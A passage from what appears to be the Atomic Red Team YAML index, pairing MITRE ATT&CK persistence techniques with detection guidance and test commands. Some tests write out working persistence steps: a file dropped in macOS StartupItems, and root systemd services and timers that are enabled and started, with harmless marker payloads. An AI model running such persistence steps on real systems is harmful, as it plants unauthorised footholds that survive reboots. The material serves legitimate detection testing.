during the bootup phase of macOS, they will run as the elevated + root user." + name: Startup Items + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1037.005 + url: https://attack.mitre.org/techniques/T1037/005 + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html + description: Apple. (2016, September 13). Startup Items. Retrieved July 11, + 2017. + source_name: Startup Items + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T23:47:39.124Z' + created: '2020-01-15T18:00:33.603Z' + x_mitre_platforms: + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. + + Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior. + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1037.005 + atomic_tests: + - name: Add file to Local Library StartupItems + auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198 + description: | + Modify or create an file in /Library/StartupItems + + [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) + supported_platforms: + - macos + executor: + command: 'sudo touch /Library/StartupItems/EvilStartup.plist + +' + cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist + +' + name: sh + elevation_required: true + T1542.001: + technique: + id: attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada + description: |- + Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI) + + System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect. + name: System Firmware + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1542.001 + url: https://attack.mitre.org/techniques/T1542/001 + - external_id: CAPEC-532 + source_name: capec + url: https://capec.mitre.org/data/definitions/532.html + - url: https://en.wikipedia.org/wiki/BIOS + description: Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016. + source_name: Wikipedia BIOS + - url: https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface + description: Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. + Retrieved July 11, 2017. + source_name: Wikipedia UEFI + - url: http://www.uefi.org/about + description: UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016. + source_name: About UEFI + - url: http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research + description: Upham, K. (2014, March). Going Deep into the BIOS with MITRE + Firmware Security Research. Retrieved January 5, 2016. + source_name: MITRE Trustworthy Firmware Measurement + - url: http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about + description: 'Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions + about BIOS Security. Retrieved December 11, 2015.' + source_name: MITRE Copernicus + - url: https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/ + description: Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against + Vault 7 Disclosure Scanning. Retrieved March 13, 2017. + source_name: McAfee CHIPSEC Blog + - url: https://github.com/chipsec/chipsec + description: Intel. (2017, March 18). CHIPSEC Platform Security Assessment + Framework. Retrieved March 20, 2017. + source_name: Github CHIPSEC + - url: http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html + description: Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. + Retrieved March 20, 2017. + source_name: Intel HackingTeam UEFI Rootkit + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-05-19T21:22:37.865Z' + created: '2019-12-19T19:43:34.507Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Jean-Ian Boutin, ESET + - McAfee + - Ryan Becwar + x_mitre_data_sources: + - 'Firmware: Firmware Modification' + x_mitre_detection: |- + System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. + + Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit) + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_defense_bypassed: + - Host intrusion prevention systems + - Anti-virus + - File monitoring + atomic_tests: [] + T1543.002: + technique: + id: attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b + description: "Adversaries may create or modify systemd services to repeatedly + execute malicious payloads as part of persistence. The systemd service manager + is commonly used for managing background daemon processes (also known as services) + and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: + Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization + (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, + CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit + and Upstart while remaining backwards compatible with the aforementioned init + systems.\n\nSystemd utilizes configuration files known as service units to + control how services boot and under what conditions. By default, these unit + files are stored in the /etc/systemd/system and /usr/lib/systemd/system + directories and have the file extension .service. Each service + unit file may contain numerous directives that can execute system commands:\n\n* + ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands + when a services is started manually by 'systemctl' or on system start if the + service is set to automatically start. \n* ExecReload directive covers when + a service restarts. \n* ExecStop and ExecStopPost directives cover when a + service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd + functionality to establish persistent access to victim systems by creating + and/or modifying service unit files that cause systemd to execute malicious + commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries + typically require root privileges to create/modify service unit files in the + /etc/systemd/system and /usr/lib/systemd/system + directories, low privilege users can create/modify service unit files in directories + such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: + Rapid7 Service Persistence 22JUNE2016)" + name: Systemd Service + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1543.002 + url: https://attack.mitre.org/techniques/T1543/002 + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html + - source_name: 'Linux man-pages: systemd January 2014' + url: http://man7.org/linux/man-pages/man1/systemd.1.html + description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. + Retrieved April 23, 2019. + - source_name: Freedesktop.org Linux systemd 29SEP2018 + url: https://www.freedesktop.org/wiki/Software/systemd/ + description: Freedesktop.org. (2018, September 29). systemd System and Service + Manager. Retrieved April 23, 2019. + - source_name: Anomali Rocke March 2019 + url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang + description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With + a New Malware Family Written in Golang. Retrieved April 24, 2019. + - source_name: Rapid7 Service Persistence 22JUNE2016 + url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence + description: Rapid7. (2016, June 22). Service Persistence. Retrieved April + 23, 2019. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T13:46:29.701Z' + created: '2020-01-17T16:15:19.870Z' + x_mitre_platforms: + - Linux + x_mitre_detection: |- + Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. + + Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables. + + Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution. + x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: true + x_mitre_version: '1.2' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Service: Service Modification' + x_mitre_contributors: + - Tony Lambert, Red Canary + identifier: T1543.002 + atomic_tests: + - name: Create Systemd Service + auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c + description: 'This test creates a Systemd service unit file and enables it as + a service. + +' + supported_platforms: + - linux + input_arguments: + systemd_service_path: + description: Path to systemd service unit file + type: Path + default: "/etc/systemd/system" + systemd_service_file: + description: File name of systemd service unit file + type: String + default: art-systemd-service.service + execstoppost_action: + description: ExecStopPost action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstoppost-marker" + execreload_action: + description: ExecReload action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execreload-marker" + execstart_action: + description: ExecStart action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstart-marker" + execstop_action: + description: ExecStop action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstop-marker" + execstartpre_action: + description: ExecStartPre action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstartpre-marker" + execstartpost_action: + description: ExecStartPost action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstartpost-marker" + executor: + command: | + echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file} + echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file} + echo "" >> #{systemd_service_path}/#{systemd_service_file} + echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file} + echo "Type=simple" + echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "" >> #{systemd_service_path}/#{systemd_service_file} + echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file} + echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file} + systemctl daemon-reload + systemctl enable #{systemd_service_file} + systemctl start #{systemd_service_file} + cleanup_command: | + systemctl stop #{systemd_service_file} + systemctl disable #{systemd_service_file} + rm -rf #{systemd_service_path}/#{systemd_service_file} + systemctl daemon-reload + name: bash + T1053.006: + technique: + id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 + description: |- + Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) + + Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. + + An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence. + name: Systemd Timers + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1053.006 + url: https://attack.mitre.org/techniques/T1053/006 + - source_name: archlinux Systemd Timers Aug 2020 + url: https://wiki.archlinux.org/index.php/Systemd/Timers + description: archlinux. (2020, August 11). systemd/Timers. Retrieved October + 12, 2020. + - source_name: 'Linux man-pages: systemd January 2014' + url: http://man7.org/linux/man-pages/man1/systemd.1.html + description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. + Retrieved April 23, 2019. + - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux + AUR Package Repository. Retrieved April 23, 2019. + url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/ + source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018 + - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public + Arch package compromise. Retrieved April 23, 2019. + url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a + source_name: gist Arch package compromise 10JUL2018 + - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved + April 23, 2019. + url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html + source_name: acroread package compromised Arch Linux Mail 8JUL2018 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-14T15:20:00.754Z' + created: '2020-10-12T17:50:31.584Z' + x_mitre_platforms: + - Linux + x_mitre_contributors: + - SarathKumar Rajendran, Trimble Inc + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_detection: |- + Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. + + Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables. + + Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020) + x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1053.006 + atomic_tests: + - name: Create Systemd Service and Timer + auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b + description: "This test creates Systemd service and timer then starts and enables + the Systemd timer \n" + supported_platforms: + - linux + input_arguments: + path_to_systemd_service: + description: Path to systemd service unit file + type: Path + default: "/etc/systemd/system/art-timer.service" + path_to_systemd_timer: + description: Path to service timer file + type: Path + default: "/etc/systemd/system/art-timer.timer" + systemd_service_name: + description: Name of systemd service + type: String + default: art-timer.service + systemd_timer_name: + description: Name of systemd service timer + type: String + default: art-timer.timer + executor: + command: | + echo "[Unit]" > #{path_to_systemd_service} + echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service} + echo "[Service]" >> #{path_to_systemd_service} + echo "Type=simple" >> #{path_to_systemd_service} + echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service} + echo "[Install]" >> #{path_to_systemd_service} + echo "WantedBy=multi-user.target" >> #{path_to_systemd_service} + echo "[Unit]" > #{path_to_systemd_timer} + echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer} + echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer} + echo "[Timer]" >> #{path_to_systemd_timer} + echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer} + echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer} + echo "[Install]" >> #{path_to_systemd_timer} + echo "WantedBy=timers.target" >> #{path_to_systemd_timer} + systemctl start #{systemd_timer_name} + systemctl enable #{systemd_timer_name} + systemctl daemon-reload + cleanup_command: | + systemctl stop #{systemd_timer_name} + systemctl disable #{systemd_timer_name} + rm #{path_to_systemd_service} + rm #{path_to_systemd_timer} + systemctl daemon-reload + name: bash + T1542.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1542.005 + url: https://attack.mitre.org/techniques/T1542/005 + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Secure Boot + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure + Boot. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Image File Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Image File Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Command History + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command + History. Retrieved October 21, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Boot Information + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot + Information. Retrieved October 21, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: TFTP Boot + description: |- + Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. + + Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks) + id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-10-22T16:35:53.806Z' + created: '2020-10-20T00:06:56.180Z' + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + - 'Firmware: Firmware Modification' + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) + + Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Network + atomic_tests: [] + T1547.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.003 + url: https://attack.mitre.org/techniques/T1547/003 + - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top + description: Microsoft. (2018, February 1). Windows Time Service (W32Time). + Retrieved March 26, 2018. + source_name: Microsoft W32Time Feb 2018 + - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx + description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. + source_name: Microsoft TimeProvider + - url: https://github.com/scottlundgren/w32time + description: Lundgren, S. (2017, October 28). w32time. Retrieved March 26, + 2018. + source_name: Github W32Time Oct 2017 + - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings + description: Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. + Retrieved March 26, 2018. + source_name: Microsoft W32Time May 2017 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Time Providers + description: |- + Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider) + + Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider) + + Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017) + id: attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T15:24:26.476Z' + created: '2020-01-24T15:51:52.317Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_detection: |- + Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017) + + The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns) + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_contributors: + - Scott Lundgren, @5twenty9, Carbon Black + x_mitre_platforms: + - Windows + atomic_tests: [] + T1205: + technique: + created: '2018-04-18T17:59:24.739Z' + modified: '2021-02-17T14:23:49.495Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1205 + url: https://attack.mitre.org/techniques/T1205 + - url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 + description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible + backdoor. Retrieved October 13, 2018.' + source_name: Hartrell cd00r 2002 + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. + - source_name: FireEye - Synful Knock + url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html + description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful + Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + - source_name: Bleeping Computer - Ryuk WoL + url: https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ + description: Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan + To Encrypt Offline Devices. Retrieved February 11, 2021. + - source_name: AMD Magic Packet + url: https://www.amd.com/system/files/TechDocs/20213.pdf + description: AMD. (1995, November 1). Magic Packet Technical White Paper. + Retrieved February 17, 2021. + - source_name: GitLab WakeOnLAN + url: https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN + description: Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February + 17, 2021. + description: |- + Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. + + Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). + + The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. + + On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. + + Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet) + name: Traffic Signaling + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c + revoked: false + x_mitre_is_subtechnique: false + x_mitre_version: '2.2' + x_mitre_defense_bypassed: + - Defensive network service scanning + x_mitre_detection: |- + Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows. + + The Wake-on-LAN magic packet consists of 6 bytes of FF followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN) + x_mitre_network_requirements: true + x_mitre_platforms: + - Linux + - macOS + - Windows + - Network + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + x_mitre_contributors: + - Josh Day, Gigamon + atomic_tests: [] + T1505.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1505.002 + url: https://attack.mitre.org/techniques/T1505/002 + - source_name: Microsoft TransportAgent Jun 2016 + url: https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help + description: Microsoft. (2016, June 1). Transport agents. Retrieved June 24, + 2019. + - source_name: ESET LightNeuron May 2019 + url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf + description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from + remote code execution. Retrieved June 24, 2019.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Transport Agent + description: "Adversaries may abuse 